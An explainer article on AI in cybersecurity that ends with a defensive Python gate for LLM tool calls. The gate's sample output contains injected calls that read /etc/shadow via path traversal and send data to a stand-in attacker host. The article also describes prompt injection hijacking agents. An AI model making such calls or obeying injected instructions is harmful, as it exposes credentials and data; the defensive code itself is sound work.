AI in Cybersecurity
AI is reshaping cybersecurity faster than any previous technology, on both sides of the contest. Defenders use it for detection at scales humans can't match; attackers use it for personalization and automation that previously required experienced operators. Understanding where AI adds real value, where it's overhyped, and where the genuine concerns live is essential for anyone making security decisions in 2026.
AI in cybersecurity spans a broad spectrum of applications, from very real wins to very real concerns. The marketing of "AI-powered security" has run far ahead of the actual capabilities in many cases; in other cases, the substantive capability is more dramatic than the marketing.
Where AI actually wins for defenders
- Anomaly detection at scale. Modern EDR and SIEM tools use ML to detect deviations from baseline behavior across millions of events. Far better than rule-based detection for novel attacks.
- Phishing classification. ML models that look at headers, URLs, content, and sender behavior catch most commodity phishing automatically. The false-positive rate is what limits aggressive blocking.
- Malware classification. Static and dynamic analysis combined with ML classifies new files faster than signature-based AV could. Most modern EDRs use ML as part of their classification pipeline.
- Triage and prioritization. Security analysts drown in alerts; ML can rank them by likely severity, reducing investigation time per analyst.
- Vulnerability discovery. Fuzz testing guided by ML and code-property graph analysis finds bugs faster than traditional fuzzing. Google's OSS-Fuzz finds tens of thousands of bugs across open-source projects this way.
- LLM-assisted code review. Spotting common security antipatterns (SQL injection, XSS, hardcoded secrets) in pull requests. Modern code-review AIs catch a real fraction of these.
Where AI is overhyped for defenders
- "AI-driven threat intelligence." Often just keyword extraction from feeds. The hard part is action, not detection.
- Autonomous response. Few organizations let AI take meaningful destructive actions (blocking accounts, isolating hosts) without human approval. The risk of false positives is too high.
- AI-powered "next-gen" antivirus that promises to catch every attack. Adversaries adapt; no model catches everything. AV with ML is meaningfully better than without, but it's not a silver bullet.
Where AI actually helps attackers
- Spear phishing at scale. LLMs let attackers personalize phishing emails for thousands of targets at a quality previously achievable only when hand-crafting a message for one. This is the most-observed AI impact on the attacker side as of 2025–2026.
- Voice cloning. Modern voice models trained on a few seconds of audio produce convincing impersonation. The Arup deepfake CFO incident (2024) combined AI-generated voice and video. Vishing attacks have improved dramatically.
- Code generation for exploits. LLMs help less-skilled attackers generate workable malware, refactor existing exploits, and write polished social-engineering content.
- Vulnerability research. The same fuzz-and-ML techniques defenders use can be turned to finding bugs in proprietary software.
- Captcha and bot defense bypass. AI solvers defeat most visual captchas; commercial captcha-solving services are AI-based.
AI-specific attack surfaces
AI systems themselves have new vulnerability categories:
- Prompt injection. Untrusted input (from users, retrieved documents, web pages) overrides the system's instructions to an LLM, getting it to behave outside policy. Currently unsolved at the architecture level.
- Data poisoning. Adversaries contribute training data designed to introduce backdoors or weaken the model.
- Model extraction. Querying an API enough times to reconstruct the model's weights or training data.
- Adversarial examples. Inputs crafted to make the model misclassify — historically demonstrated on image classifiers, also against malware classifiers.
- Memorization. Models memorize training data; if training data included secrets (API keys committed to public GitHub) the model may leak them.
The big shifts as of 2026
- AI agents are becoming a real attack surface. Autonomous agents with tool access (browsers, shells, APIs) can be hijacked via prompt injection into doing the attacker's bidding.
- Defenders increasingly use LLMs in the SOC. For drafting incident reports, summarizing logs, suggesting next steps. Cuts response time meaningfully.
- The arms race is real. Both sides are deploying AI faster than legal and regulatory frameworks adapt. The next several years will be turbulent.
What this means for users
For individuals:
- Phishing is going to be better-written. Don't treat prose quality as a signal anymore.
- Voice and video deepfakes are real. For high-stakes verification, use code phrases or callback to known numbers.
- Hardware-key 2FA defeats most AI-enhanced phishing because the key's origin binding ignores prose quality: it will not produce a valid response for a look-alike domain, however convincing the message is.
- Browser and OS protections have also improved; the net effect for an ordinarily careful user is roughly neutral.
For organizations:
- Invest in EDR/XDR with strong ML components — the floor of defense has risen.
- Plan for AI-enhanced social engineering. Out-of-band verification protocols matter more than ever.
- If you deploy LLMs internally, treat them as untrusted code-execution surfaces. Prompt injection is real.
- Don't let "AI security" buzzwords drive procurement. Ask what the model does, how it's trained, how false positives are managed.
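One way to act on the advice above to treat internally deployed LLMs as untrusted code-execution surfaces, and on the agent-hijacking risk from prompt injection described earlier: gate every tool call the model proposes against an explicit policy before anything executes. This is an added example, not the article's code; the tool names, URL and path patterns, and the newline-delimited JSON output format are assumptions.

```python
import json
import re
from dataclasses import dataclass
# Per-tool argument policy: accepted argument names and value patterns (assumed).
ALLOWED_TOOLS = {
    "web_fetch": {"url": re.compile(r"https://(docs|intranet)\.example\.com/")},
    "read_file": {"path": re.compile(r"/srv/kb/[\w./-]+$")},
}
@dataclass
class Decision:
    allowed: bool
    reason: str

def gate_tool_call(call: dict) -> Decision:
    """Validate one model-proposed tool call before anything executes: deny
    unknown tools, unexpected argument sets, traversal, and off-policy values."""
    name = call.get("tool")
    args = call.get("args") or {}
    spec = ALLOWED_TOOLS.get(name)
    if spec is None:
        return Decision(False, f"tool {name!r} is not allowlisted")
    if not isinstance(args, dict) or set(args) != set(spec):
        return Decision(False, f"unexpected arguments for {name!r}")
    for key, pattern in spec.items():
        value = str(args[key])
        if ".." in value or not pattern.match(value):
            return Decision(False, f"{name}.{key}={value!r} violates policy")
    return Decision(True, "ok")

def gate_model_output(raw: str) -> list[tuple[dict, Decision]]:
    """Parse newline-delimited JSON tool calls (an assumed output format) and
    gate each one; anything unparseable is denied rather than executed."""
    results = []
    for line in filter(None, map(str.strip, raw.splitlines())):
        try:
            call = json.loads(line)
        except json.JSONDecodeError:
            call = None
        if not isinstance(call, dict):
            call = {"tool": None, "raw": line}  # denied below: no such tool
        results.append((call, gate_tool_call(call)))
    return results

# Constructed sample: one legitimate call, then three steered by an injected page.
MODEL_OUTPUT = """
{"tool": "web_fetch", "args": {"url": "https://docs.example.com/policy.html"}}
{"tool": "read_file", "args": {"path": "/srv/kb/../../etc/shadow"}}
{"tool": "send_email", "args": {"to": "outside@attacker.invalid", "body": "..."}}
{"tool": "web_fetch", "args": {"url": "https://attacker.invalid/collect?d=secret"}}
"""
```

The gate sits between the model and the tool executor, so a hijacked model can only ask for actions the policy already permits; denials are also the natural place to log and alert on suspected injection.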
Frequently asked questions
- Can AI replace security analysts?
- It changes their job rather than eliminating it. AI handles triage, alert correlation, and routine investigation; humans handle escalation, judgment calls, incident response, and policy. The SOCs of 2026 have fewer Tier-1 roles and more Tier-2/Tier-3 roles than the SOCs of 2020.
- Are AI-generated phishing emails detectable?
- Less so than they used to be. Detection based on linguistic tells has eroded. ML-based detection still works on other signals (sender reputation, embedded URL behavior, attachment characteristics, sending patterns). The defense is moving up the stack, to authentication (DMARC, hardware MFA), and out of the content layer.
- Is generative AI itself a security risk?
- Yes, in several ways. It lets less-skilled attackers operate at higher quality, generates more convincing social engineering, and creates new attack surfaces (prompt injection, data leakage). It's not magically dangerous; it's a productivity multiplier, and it multiplies attackers' productivity as much as defenders'.
- Should small businesses use AI security tools?
- The major EDR products with ML components (Defender, CrowdStrike, SentinelOne) are appropriate and increasingly accessible to small businesses. Standalone "AI security" products from less-established vendors warrant more skepticism; many are older detection logic with an ML layer and fresh marketing on top.
- Will AI break encryption?
- Not directly. AI doesn't compromise the math of AES, RSA, or modern ciphers. AI can accelerate side-channel analysis, password cracking against weak hashes, and exploit development against software bugs that themselves enable decryption. The crypto remains sound; the surrounding implementations remain the realistic attack surface.